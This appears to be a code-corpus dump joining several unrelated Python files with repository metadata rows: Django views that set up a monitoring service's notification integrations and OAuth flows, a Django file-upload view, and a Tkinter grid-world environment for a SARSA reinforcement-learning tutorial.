@login_required
def add_webhook(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.WebhookForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="webhook")
channel.name = form.cleaned_data["name"]
channel.value = form.get_value()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.WebhookForm()
ctx = {
"page": "channels",
"project": project,
"form": form,
}
return render(request, "integrations/webhook_form.html", ctx)
@login_required
def edit_webhook(request, code):
channel = _get_rw_channel_for_user(request, code)
if channel.kind != "webhook":
return HttpResponseBadRequest()
if request.method == "POST":
form = forms.WebhookForm(request.POST)
if form.is_valid():
channel.name = form.cleaned_data["name"]
channel.value = form.get_value()
channel.save()
return redirect("hc-channels", channel.project.code)
else:
def flatten(d):
return "\n".join("%s: %s" % pair for pair in d.items())
doc = json.loads(channel.value)
doc["headers_down"] = flatten(doc["headers_down"])
doc["headers_up"] = flatten(doc["headers_up"])
doc["name"] = channel.name
form = forms.WebhookForm(doc)
ctx = {
"page": "channels",
"project": channel.project,
"channel": channel,
"form": form,
}
return render(request, "integrations/webhook_form.html", ctx)
@require_setting("SHELL_ENABLED")
@login_required
def add_shell(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddShellForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="shell")
channel.value = form.get_value()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddShellForm()
ctx = {
"page": "channels",
"project": project,
"form": form,
}
return render(request, "integrations/add_shell.html", ctx)
@require_setting("PD_ENABLED")
@login_required
def add_pd(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddPdForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="pd")
channel.value = form.cleaned_data["value"]
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddPdForm()
ctx = {"page": "channels", "form": form}
return render(request, "integrations/add_pd.html", ctx)
@require_setting("PD_ENABLED")
@require_setting("PD_VENDOR_KEY")
def pdc_help(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_pdc.html", ctx)
@require_setting("PD_ENABLED")
@require_setting("PD_VENDOR_KEY")
@login_required
def add_pdc(request, code):
project = _get_rw_project_for_user(request, code)
state = token_urlsafe()
callback = settings.SITE_ROOT + reverse(
"hc-add-pdc-complete", args=[project.code, state]
)
connect_url = "https://connect.pagerduty.com/connect?" + urlencode(
{"vendor": settings.PD_VENDOR_KEY, "callback": callback}
)
ctx = {"page": "channels", "project": project, "connect_url": connect_url}
request.session["pd"] = state
return render(request, "integrations/add_pdc.html", ctx)
@require_setting("PD_ENABLED")
@require_setting("PD_VENDOR_KEY")
@login_required
def add_pdc_complete(request, code, state):
if "pd" not in request.session:
return HttpResponseBadRequest()
project = _get_rw_project_for_user(request, code)
session_state = request.session.pop("pd")
if session_state != state:
return HttpResponseBadRequest()
if request.GET.get("error") == "cancelled":
messages.warning(request, "PagerDuty setup was cancelled.")
return redirect("hc-channels", project.code)
channel = Channel(kind="pd", project=project)
channel.value = json.dumps(
{
"service_key": request.GET.get("service_key"),
"account": request.GET.get("account"),
}
)
channel.save()
channel.assign_all_checks()
messages.success(request, "The PagerDuty integration has been added!")
return redirect("hc-channels", project.code)
@require_setting("PAGERTREE_ENABLED")
@login_required
def add_pagertree(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddUrlForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="pagertree")
channel.value = form.cleaned_data["value"]
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddUrlForm()
ctx = {"page": "channels", "project": project, "form": form}
return render(request, "integrations/add_pagertree.html", ctx)
@require_setting("SLACK_ENABLED")
@login_required
def add_slack(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddUrlForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="slack")
channel.value = form.cleaned_data["value"]
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddUrlForm()
ctx = {
"page": "channels",
"form": form,
}
return render(request, "integrations/add_slack.html", ctx)
@require_setting("SLACK_ENABLED")
@require_setting("SLACK_CLIENT_ID")
def slack_help(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_slack_btn.html", ctx)
@require_setting("SLACK_ENABLED")
@require_setting("SLACK_CLIENT_ID")
@login_required
def add_slack_btn(request, code):
project = _get_rw_project_for_user(request, code)
state = token_urlsafe()
authorize_url = "https://slack.com/oauth/v2/authorize?" + urlencode(
{
"scope": "incoming-webhook",
"client_id": settings.SLACK_CLIENT_ID,
"state": state,
}
)
ctx = {
"project": project,
"page": "channels",
"authorize_url": authorize_url,
}
request.session["add_slack"] = (state, str(project.code))
return render(request, "integrations/add_slack_btn.html", ctx)
@require_setting("SLACK_ENABLED")
@require_setting("SLACK_CLIENT_ID")
@login_required
def add_slack_complete(request):
if "add_slack" not in request.session:
return HttpResponseForbidden()
state, code = request.session.pop("add_slack")
project = _get_rw_project_for_user(request, code)
if request.GET.get("error") == "access_denied":
messages.warning(request, "Slack setup was cancelled.")
return redirect("hc-channels", project.code)
if request.GET.get("state") != state:
return HttpResponseForbidden()
result = requests.post(
"https://slack.com/api/oauth.v2.access",
{
"client_id": settings.SLACK_CLIENT_ID,
"client_secret": settings.SLACK_CLIENT_SECRET,
"code": request.GET.get("code"),
},
)
doc = result.json()
if doc.get("ok"):
channel = Channel(kind="slack", project=project)
channel.value = result.text
channel.save()
channel.assign_all_checks()
messages.success(request, "The Slack integration has been added!")
else:
s = doc.get("error")
messages.warning(request, "Error message from slack: %s" % s)
return redirect("hc-channels", project.code)
@require_setting("MATTERMOST_ENABLED")
@login_required
def add_mattermost(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddUrlForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="mattermost")
channel.value = form.cleaned_data["value"]
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddUrlForm()
ctx = {"page": "channels", "form": form, "project": project}
return render(request, "integrations/add_mattermost.html", ctx)
@require_setting("PUSHBULLET_CLIENT_ID")
@login_required
def add_pushbullet(request, code):
project = _get_rw_project_for_user(request, code)
state = token_urlsafe()
authorize_url = "https://www.pushbullet.com/authorize?" + urlencode(
{
"client_id": settings.PUSHBULLET_CLIENT_ID,
"redirect_uri": settings.SITE_ROOT + reverse(add_pushbullet_complete),
"response_type": "code",
"state": state,
}
)
ctx = {
"page": "channels",
"project": project,
"authorize_url": authorize_url,
}
request.session["add_pushbullet"] = (state, str(project.code))
return render(request, "integrations/add_pushbullet.html", ctx)
@require_setting("PUSHBULLET_CLIENT_ID")
@login_required
def add_pushbullet_complete(request):
if "add_pushbullet" not in request.session:
return HttpResponseForbidden()
state, code = request.session.pop("add_pushbullet")
project = _get_rw_project_for_user(request, code)
if request.GET.get("error") == "access_denied":
messages.warning(request, "Pushbullet setup was cancelled.")
return redirect("hc-channels", project.code)
if request.GET.get("state") != state:
return HttpResponseForbidden()
result = requests.post(
"https://api.pushbullet.com/oauth2/token",
{
"client_id": settings.PUSHBULLET_CLIENT_ID,
"client_secret": settings.PUSHBULLET_CLIENT_SECRET,
"code": request.GET.get("code"),
"grant_type": "authorization_code",
},
)
doc = result.json()
if "access_token" in doc:
channel = Channel(kind="pushbullet", project=project)
channel.value = doc["access_token"]
channel.save()
channel.assign_all_checks()
messages.success(request, "The Pushbullet integration has been added!")
else:
messages.warning(request, "Something went wrong")
return redirect("hc-channels", project.code)
@require_setting("DISCORD_CLIENT_ID")
@login_required
def add_discord(request, code):
project = _get_rw_project_for_user(request, code)
state = token_urlsafe()
auth_url = "https://discordapp.com/api/oauth2/authorize?" + urlencode(
{
"client_id": settings.DISCORD_CLIENT_ID,
"scope": "webhook.incoming",
"redirect_uri": settings.SITE_ROOT + reverse(add_discord_complete),
"response_type": "code",
"state": state,
}
)
ctx = {"page": "channels", "project": project, "authorize_url": auth_url}
request.session["add_discord"] = (state, str(project.code))
return render(request, "integrations/add_discord.html", ctx)
@require_setting("DISCORD_CLIENT_ID")
@login_required
def add_discord_complete(request):
if "add_discord" not in request.session:
return HttpResponseForbidden()
state, code = request.session.pop("add_discord")
project = _get_rw_project_for_user(request, code)
if request.GET.get("error") == "access_denied":
messages.warning(request, "Discord setup was cancelled.")
return redirect("hc-channels", project.code)
if request.GET.get("state") != state:
return HttpResponseForbidden()
result = requests.post(
"https://discordapp.com/api/oauth2/token",
{
"client_id": settings.DISCORD_CLIENT_ID,
"client_secret": settings.DISCORD_CLIENT_SECRET,
"code": request.GET.get("code"),
"grant_type": "authorization_code",
"redirect_uri": settings.SITE_ROOT + reverse(add_discord_complete),
},
)
doc = result.json()
if "access_token" in doc:
channel = Channel(kind="discord", project=project)
channel.value = result.text
channel.save()
channel.assign_all_checks()
messages.success(request, "The Discord integration has been added!")
else:
messages.warning(request, "Something went wrong.")
return redirect("hc-channels", project.code)
@require_setting("PUSHOVER_API_TOKEN")
def pushover_help(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_pushover_help.html", ctx)
@require_setting("PUSHOVER_API_TOKEN")
@login_required
def add_pushover(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
state = token_urlsafe()
failure_url = settings.SITE_ROOT + reverse("hc-channels", args=[project.code])
success_url = (
settings.SITE_ROOT
+ reverse("hc-add-pushover", args=[project.code])
+ "?"
+ urlencode(
{
"state": state,
"prio": request.POST.get("po_priority", "0"),
"prio_up": request.POST.get("po_priority_up", "0"),
}
)
)
subscription_url = (
settings.PUSHOVER_SUBSCRIPTION_URL
+ "?"
+ urlencode({"success": success_url, "failure": failure_url})
)
request.session["pushover"] = state
return redirect(subscription_url)
# Handle successful subscriptions
if "pushover_user_key" in request.GET:
if "pushover" not in request.session:
return HttpResponseForbidden()
state = request.session.pop("pushover")
if request.GET.get("state") != state:
return HttpResponseForbidden()
if request.GET.get("pushover_unsubscribed") == "1":
# Unsubscription: delete all Pushover channels for this project
Channel.objects.filter(project=project, kind="po").delete()
return redirect("hc-channels", project.code)
form = forms.AddPushoverForm(request.GET)
if not form.is_valid():
return HttpResponseBadRequest()
channel = Channel(project=project, kind="po")
channel.value = form.get_value()
channel.save()
channel.assign_all_checks()
messages.success(request, "The Pushover integration has been added!")
return redirect("hc-channels", project.code)
# Show Integration Settings form
ctx = {
"page": "channels",
"project": project,
"po_retry_delay": td(seconds=settings.PUSHOVER_EMERGENCY_RETRY_DELAY),
"po_expiration": td(seconds=settings.PUSHOVER_EMERGENCY_EXPIRATION),
}
return render(request, "integrations/add_pushover.html", ctx)
@require_setting("OPSGENIE_ENABLED")
@login_required
def add_opsgenie(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddOpsgenieForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="opsgenie")
v = {"region": form.cleaned_data["region"], "key": form.cleaned_data["key"]}
channel.value = json.dumps(v)
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddOpsgenieForm()
ctx = {"page": "channels", "project": project, "form": form}
return render(request, "integrations/add_opsgenie.html", ctx)
@require_setting("VICTOROPS_ENABLED")
@login_required
def add_victorops(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddUrlForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="victorops")
channel.value = form.cleaned_data["value"]
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddUrlForm()
ctx = {"page": "channels", "project": project, "form": form}
return render(request, "integrations/add_victorops.html", ctx)
@require_setting("ZULIP_ENABLED")
@login_required
def add_zulip(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddZulipForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="zulip")
channel.value = form.get_value()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddZulipForm()
ctx = {"page": "channels", "project": project, "form": form}
return render(request, "integrations/add_zulip.html", ctx)
@csrf_exempt
@require_POST
def telegram_bot(request):
try:
doc = json.loads(request.body.decode())
jsonschema.validate(doc, telegram_callback)
except ValueError:
return HttpResponseBadRequest()
except jsonschema.ValidationError:
# We don't recognize the message format, but don't want Telegram
# retrying this over and over again, so respond with 200 OK
return HttpResponse()
if "/start" not in doc["message"]["text"]:
return HttpResponse()
chat = doc["message"]["chat"]
name = max(chat.get("title", ""), chat.get("username", ""))
invite = render_to_string(
"integrations/telegram_invite.html",
{"qs": signing.dumps((chat["id"], chat["type"], name))},
)
Telegram.send(chat["id"], invite)
return HttpResponse()
@require_setting("TELEGRAM_TOKEN")
def telegram_help(request):
ctx = {
"page": "channels",
"bot_name": settings.TELEGRAM_BOT_NAME,
}
return render(request, "integrations/add_telegram.html", ctx)
@require_setting("TELEGRAM_TOKEN")
@login_required
def add_telegram(request):
chat_id, chat_type, chat_name = None, None, None
qs = request.META["QUERY_STRING"]
if qs:
try:
chat_id, chat_type, chat_name = signing.loads(qs, max_age=600)
except signing.BadSignature:
return render(request, "bad_link.html")
if request.method == "POST":
project = _get_rw_project_for_user(request, request.POST.get("project"))
channel = Channel(project=project, kind="telegram")
channel.value = json.dumps(
{"id": chat_id, "type": chat_type, "name": chat_name}
)
channel.save()
channel.assign_all_checks()
messages.success(request, "The Telegram integration has been added!")
return redirect("hc-channels", project.code)
ctx = {
"page": "channels",
"projects": request.profile.projects(),
"chat_id": chat_id,
"chat_type": chat_type,
"chat_name": chat_name,
"bot_name": settings.TELEGRAM_BOT_NAME,
}
return render(request, "integrations/add_telegram.html", ctx)
@require_setting("TWILIO_AUTH")
@login_required
def add_sms(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.PhoneNumberForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="sms")
channel.name = form.cleaned_data["label"]
channel.value = form.get_json()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.PhoneNumberForm()
ctx = {
"page": "channels",
"project": project,
"form": form,
"profile": project.owner_profile,
}
return render(request, "integrations/add_sms.html", ctx)
@require_setting("TWILIO_AUTH")
@login_required
def add_call(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.PhoneNumberForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="call")
channel.name = form.cleaned_data["label"]
channel.value = form.get_json()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.PhoneNumberForm()
ctx = {
"page": "channels",
"project": project,
"form": form,
"profile": project.owner_profile,
}
return render(request, "integrations/add_call.html", ctx)
@require_setting("TWILIO_USE_WHATSAPP")
@login_required
def add_whatsapp(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.PhoneUpDownForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="whatsapp")
channel.name = form.cleaned_data["label"]
channel.value = form.get_json()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.PhoneUpDownForm()
ctx = {
"page": "channels",
"project": project,
"form": form,
"profile": project.owner_profile,
}
return render(request, "integrations/add_whatsapp.html", ctx)
@require_setting("SIGNAL_CLI_ENABLED")
@login_required
def add_signal(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.PhoneUpDownForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="signal")
channel.name = form.cleaned_data["label"]
channel.value = form.get_json()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.PhoneUpDownForm()
ctx = {
"page": "channels",
"project": project,
"form": form,
"profile": project.owner_profile,
}
return render(request, "integrations/add_signal.html", ctx)
@require_setting("TRELLO_APP_KEY")
@login_required
def add_trello(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddTrelloForm(request.POST)
if not form.is_valid():
return HttpResponseBadRequest()
channel = Channel(project=project, kind="trello")
channel.value = form.get_value()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
return_url = settings.SITE_ROOT + reverse("hc-add-trello", args=[project.code])
authorize_url = "https://trello.com/1/authorize?" + urlencode(
{
"expiration": "never",
"name": settings.SITE_NAME,
"scope": "read,write",
"response_type": "token",
"key": settings.TRELLO_APP_KEY,
"return_url": return_url,
}
)
ctx = {
"page": "channels",
"project": project,
"authorize_url": authorize_url,
}
return render(request, "integrations/add_trello.html", ctx)
@require_setting("MATRIX_ACCESS_TOKEN")
@login_required
def add_matrix(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddMatrixForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="matrix")
channel.value = form.cleaned_data["room_id"]
# If user supplied room alias instead of ID, use it as channel name
alias = form.cleaned_data["alias"]
if not alias.startswith("!"):
channel.name = alias
channel.save()
channel.assign_all_checks()
messages.success(request, "The Matrix integration has been added!")
return redirect("hc-channels", project.code)
else:
form = forms.AddMatrixForm()
ctx = {
"page": "channels",
"project": project,
"form": form,
"matrix_user_id": settings.MATRIX_USER_ID,
}
return render(request, "integrations/add_matrix.html", ctx)
@require_setting("APPRISE_ENABLED")
@login_required
def add_apprise(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddAppriseForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="apprise")
channel.value = form.cleaned_data["url"]
channel.save()
channel.assign_all_checks()
messages.success(request, "The Apprise integration has been added!")
return redirect("hc-channels", project.code)
else:
form = forms.AddAppriseForm()
ctx = {"page": "channels", "project": project, "form": form}
return render(request, "integrations/add_apprise.html", ctx)
@require_setting("TRELLO_APP_KEY")
@login_required
@require_POST
def trello_settings(request):
token = request.POST.get("token")
url = "https://api.trello.com/1/members/me/boards?" + urlencode(
{
"key": settings.TRELLO_APP_KEY,
"token": token,
"filter": "open",
"fields": "id,name",
"lists": "open",
"list_fields": "id,name",
}
)
boards = requests.get(url).json()
num_lists = sum(len(board["lists"]) for board in boards)
ctx = {"token": token, "boards": boards, "num_lists": num_lists}
return render(request, "integrations/trello_settings.html", ctx)
@require_setting("MSTEAMS_ENABLED")
@login_required
def add_msteams(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddUrlForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="msteams")
channel.value = form.cleaned_data["value"]
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddUrlForm()
ctx = {"page": "channels", "project": project, "form": form}
return render(request, "integrations/add_msteams.html", ctx)
@require_setting("PROMETHEUS_ENABLED")
@login_required
def add_prometheus(request, code):
project, rw = _get_project_for_user(request, code)
ctx = {"page": "channels", "project": project}
return render(request, "integrations/add_prometheus.html", ctx)
@require_setting("PROMETHEUS_ENABLED")
def metrics(request, code, key):
if len(key) != 32:
return HttpResponseBadRequest()
q = Project.objects.filter(code=code, api_key_readonly=key)
try:
project = q.get()
except Project.DoesNotExist:
return HttpResponseForbidden()
checks = Check.objects.filter(project_id=project.id).order_by("id")
def esc(s):
return s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")
def output(checks):
yield "# HELP hc_check_up Whether the check is currently up (1 for yes, 0 for no).\n"
yield "# TYPE hc_check_up gauge\n"
TMPL = """hc_check_up{name="%s", tags="%s", unique_key="%s"} %d\n"""
for check in checks:
value = 0 if check.get_status() == "down" else 1
yield TMPL % (esc(check.name), esc(check.tags), check.unique_key, value)
tags_statuses, num_down = _tags_statuses(checks)
yield "\n"
yield "# HELP hc_tag_up Whether all checks with this tag are up (1 for yes, 0 for no).\n"
yield "# TYPE hc_tag_up gauge\n"
TMPL = """hc_tag_up{tag="%s"} %d\n"""
for tag in sorted(tags_statuses):
value = 0 if tags_statuses[tag] == "down" else 1
yield TMPL % (esc(tag), value)
yield "\n"
yield "# HELP hc_checks_total The total number of checks.\n"
yield "# TYPE hc_checks_total gauge\n"
yield "hc_checks_total %d\n" % len(checks)
yield "\n"
yield "# HELP hc_checks_down_total The number of checks currently down.\n"
yield "# TYPE hc_checks_down_total gauge\n"
yield "hc_checks_down_total %d\n" % num_down
return HttpResponse(output(checks), content_type="text/plain")
@require_setting("SPIKE_ENABLED")
@login_required
def add_spike(request, code):
project = _get_rw_project_for_user(request, code)
if request.method == "POST":
form = forms.AddUrlForm(request.POST)
if form.is_valid():
channel = Channel(project=project, kind="spike")
channel.value = form.cleaned_data["value"]
channel.save()
channel.assign_all_checks()
return redirect("hc-channels", project.code)
else:
form = forms.AddUrlForm()
ctx = {"page": "channels", "project": project, "form": form}
return render(request, "integrations/add_spike.html", ctx)
@require_setting("LINENOTIFY_CLIENT_ID")
@login_required
def add_linenotify(request, code):
project = _get_rw_project_for_user(request, code)
state = token_urlsafe()
authorize_url = " https://notify-bot.line.me/oauth/authorize?" + urlencode(
{
"client_id": settings.LINENOTIFY_CLIENT_ID,
"redirect_uri": settings.SITE_ROOT + reverse(add_linenotify_complete),
"response_type": "code",
"state": state,
"scope": "notify",
}
)
ctx = {
"page": "channels",
"project": project,
"authorize_url": authorize_url,
}
request.session["add_linenotify"] = (state, str(project.code))
return render(request, "integrations/add_linenotify.html", ctx)
@require_setting("LINENOTIFY_CLIENT_ID")
@login_required
def add_linenotify_complete(request):
if "add_linenotify" not in request.session:
return HttpResponseForbidden()
state, code = request.session.pop("add_linenotify")
if request.GET.get("state") != state:
return HttpResponseForbidden()
project = _get_rw_project_for_user(request, code)
if request.GET.get("error") == "access_denied":
messages.warning(request, "LINE Notify setup was cancelled.")
return redirect("hc-channels", project.code)
# Exchange code for access token
result = requests.post(
"https://notify-bot.line.me/oauth/token",
{
"grant_type": "authorization_code",
"code": request.GET.get("code"),
"redirect_uri": settings.SITE_ROOT + reverse(add_linenotify_complete),
"client_id": settings.LINENOTIFY_CLIENT_ID,
"client_secret": settings.LINENOTIFY_CLIENT_SECRET,
},
)
doc = result.json()
if doc.get("status") != 200:
messages.warning(request, "Something went wrong.")
return redirect("hc-channels", project.code)
# Fetch notification target's name, will use it as channel name:
token = doc["access_token"]
result = requests.get(
"https://notify-api.line.me/api/status",
headers={"Authorization": "Bearer %s" % token},
)
doc = result.json()
channel = Channel(kind="linenotify", project=project)
channel.name = doc.get("target")
channel.value = token
channel.save()
channel.assign_all_checks()
messages.success(request, "The LINE Notify integration has been added!")
return redirect("hc-channels", project.code)
# Forks: add custom views after this line
| 31.373307 | 97 | 0.642458 |
acf6d809178b7da496efc97fb884b54fabb14dbc | 2,237 | py | Python | src/files/views.py | raonyguimaraes/OncoX | f2fe6e9a786fd81f7933c8a54beef948e8527604 | [
"MIT"
] | null | null | null | src/files/views.py | raonyguimaraes/OncoX | f2fe6e9a786fd81f7933c8a54beef948e8527604 | [
"MIT"
] | null | null | null | src/files/views.py | raonyguimaraes/OncoX | f2fe6e9a786fd81f7933c8a54beef948e8527604 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
import json
import os
from forms import FileForm
from models import File
def response_mimetype(request):
if "application/json" in request.META['HTTP_ACCEPT']:
return "application/json"
else:
return "text/plain"
class JSONResponse(HttpResponse):
"""JSON response class."""
def __init__(self,obj='',json_opts={},mimetype="application/json",*args,**kwargs):
content = json.dumps(obj,**json_opts)
super(JSONResponse,self).__init__(content,mimetype,*args,**kwargs)
@login_required
def create(request):
# return render(request, 'files/create.html', {"foo": "bar"})
print 'entrou no create'
if request.method == 'POST':
form = FileForm(request.POST, request.FILES)
print 'request is post!'
print form.errors
if form.is_valid():
print 'form is valid!'
# print 'analysis name should be ', form.cleaned_data['name']
# file.name = form.cleaned_data['name']
file = File.objects.create(user=request.user)
file.file= request.FILES.get('file')
file.name= str(os.path.splitext(file.file.name)[0])
file.user = request.user
file.save()
f = file.file
#fix permissions
#os.chmod("%s/genomes/%s/" % (settings.BASE_DIR, fastafile.user), 0777)
# os.chmod("%s/uploads/%s/%s" % (settings.BASE_DIR, fastafile.user, fastafile.id), 0777)
#Align.delay(analysis.id)
data = {'files': [{'deleteType': 'DELETE', 'name': file.name, 'url': '', 'thumbnailUrl': '', 'type': 'image/png', 'deleteUrl': '', 'size': f.size}]}
response = JSONResponse(data, mimetype=response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
else:
form = FileForm()
return render(request, 'files/create.html', {'form':form})
def list(request):
files = File.objects.all()
return render(request, 'files/index.html', {"files": files}) | 31.957143 | 160 | 0.610639 |
acf6d819177b6dd97714ea4ae8915c91db2a073b | 4,802 | py | Python | 1-grid-world/4-sarsa/environment.py | kyuhyoung/reinforcement-learning | 8c7f56be786bdcb6244bdcf79c2ae7f6a6c3f5c1 | [
"MIT"
] | 3,220 | 2017-04-16T02:01:42.000Z | 2022-03-30T13:57:38.000Z | 1-grid-world/4-sarsa/environment.py | kyuhyoung/reinforcement-learning | 8c7f56be786bdcb6244bdcf79c2ae7f6a6c3f5c1 | [
"MIT"
] | 72 | 2017-04-15T22:54:21.000Z | 2022-02-09T23:26:59.000Z | 1-grid-world/4-sarsa/environment.py | kyuhyoung/reinforcement-learning | 8c7f56be786bdcb6244bdcf79c2ae7f6a6c3f5c1 | [
"MIT"
] | 801 | 2017-04-16T05:42:03.000Z | 2022-03-31T02:24:46.000Z | import time
import numpy as np
import tkinter as tk
from PIL import ImageTk, Image
np.random.seed(1)
PhotoImage = ImageTk.PhotoImage
UNIT = 100 # pixels
HEIGHT = 5 # grid height
WIDTH = 5 # grid width
class Env(tk.Tk):
def __init__(self):
super(Env, self).__init__()
self.action_space = ['u', 'd', 'l', 'r']
self.n_actions = len(self.action_space)
self.title('SARSA')
self.geometry('{0}x{1}'.format(HEIGHT * UNIT, HEIGHT * UNIT))
self.shapes = self.load_images()
self.canvas = self._build_canvas()
self.texts = []
def _build_canvas(self):
canvas = tk.Canvas(self, bg='white',
height=HEIGHT * UNIT,
width=WIDTH * UNIT)
# create grids
for c in range(0, WIDTH * UNIT, UNIT): # 0~400 by 80
x0, y0, x1, y1 = c, 0, c, HEIGHT * UNIT
canvas.create_line(x0, y0, x1, y1)
for r in range(0, HEIGHT * UNIT, UNIT): # 0~400 by 80
x0, y0, x1, y1 = 0, r, HEIGHT * UNIT, r
canvas.create_line(x0, y0, x1, y1)
# add img to canvas
self.rectangle = canvas.create_image(50, 50, image=self.shapes[0])
self.triangle1 = canvas.create_image(250, 150, image=self.shapes[1])
self.triangle2 = canvas.create_image(150, 250, image=self.shapes[1])
self.circle = canvas.create_image(250, 250, image=self.shapes[2])
# pack all
canvas.pack()
return canvas
def load_images(self):
rectangle = PhotoImage(
Image.open("../img/rectangle.png").resize((65, 65)))
triangle = PhotoImage(
Image.open("../img/triangle.png").resize((65, 65)))
circle = PhotoImage(
Image.open("../img/circle.png").resize((65, 65)))
return rectangle, triangle, circle
def text_value(self, row, col, contents, action, font='Helvetica', size=10,
style='normal', anchor="nw"):
if action == 0:
origin_x, origin_y = 7, 42
elif action == 1:
origin_x, origin_y = 85, 42
elif action == 2:
origin_x, origin_y = 42, 5
else:
origin_x, origin_y = 42, 77
x, y = origin_y + (UNIT * col), origin_x + (UNIT * row)
font = (font, str(size), style)
text = self.canvas.create_text(x, y, fill="black", text=contents,
font=font, anchor=anchor)
return self.texts.append(text)
def print_value_all(self, q_table):
for i in self.texts:
self.canvas.delete(i)
self.texts.clear()
for x in range(HEIGHT):
for y in range(WIDTH):
for action in range(0, 4):
state = [x, y]
if str(state) in q_table.keys():
temp = q_table[str(state)][action]
self.text_value(y, x, round(temp, 2), action)
def coords_to_state(self, coords):
x = int((coords[0] - 50) / 100)
y = int((coords[1] - 50) / 100)
return [x, y]
def reset(self):
self.update()
time.sleep(0.5)
x, y = self.canvas.coords(self.rectangle)
self.canvas.move(self.rectangle, UNIT / 2 - x, UNIT / 2 - y)
self.render()
# return observation
return self.coords_to_state(self.canvas.coords(self.rectangle))
def step(self, action):
state = self.canvas.coords(self.rectangle)
base_action = np.array([0, 0])
self.render()
if action == 0: # up
if state[1] > UNIT:
base_action[1] -= UNIT
elif action == 1: # down
if state[1] < (HEIGHT - 1) * UNIT:
base_action[1] += UNIT
elif action == 2: # left
if state[0] > UNIT:
base_action[0] -= UNIT
elif action == 3: # right
if state[0] < (WIDTH - 1) * UNIT:
base_action[0] += UNIT
# move agent
self.canvas.move(self.rectangle, base_action[0], base_action[1])
# move rectangle to top level of canvas
self.canvas.tag_raise(self.rectangle)
next_state = self.canvas.coords(self.rectangle)
# reward function
if next_state == self.canvas.coords(self.circle):
reward = 100
done = True
elif next_state in [self.canvas.coords(self.triangle1),
self.canvas.coords(self.triangle2)]:
reward = -100
done = True
else:
reward = 0
done = False
next_state = self.coords_to_state(next_state)
return next_state, reward, done
def render(self):
time.sleep(0.03)
self.update()
| 33.58042 | 79 | 0.533736 |
acf6d97d8dbbd1579935b13c9a7136c13c7bff4d | 10,379 | py | Python | Aeneas/aeneas/aeneas/ffprobewrapper.py | yalhaizaey/Dreich | 9528856c3879d4c9d3ced453f223785a71188808 | [
"Apache-2.0"
] | 25 | 2019-05-09T19:03:37.000Z | 2022-02-06T20:47:37.000Z | Experiments/Aeneas/aeneas/aeneas/ffprobewrapper.py | jonathanmcchesney/DeFog | bc314d41471d00b9d605bb4519f31a465e0a6b75 | [
"Apache-2.0"
] | null | null | null | Experiments/Aeneas/aeneas/aeneas/ffprobewrapper.py | jonathanmcchesney/DeFog | bc314d41471d00b9d605bb4519f31a465e0a6b75 | [
"Apache-2.0"
] | 9 | 2019-08-19T19:00:41.000Z | 2021-12-09T04:46:07.000Z | #!/usr/bin/env python
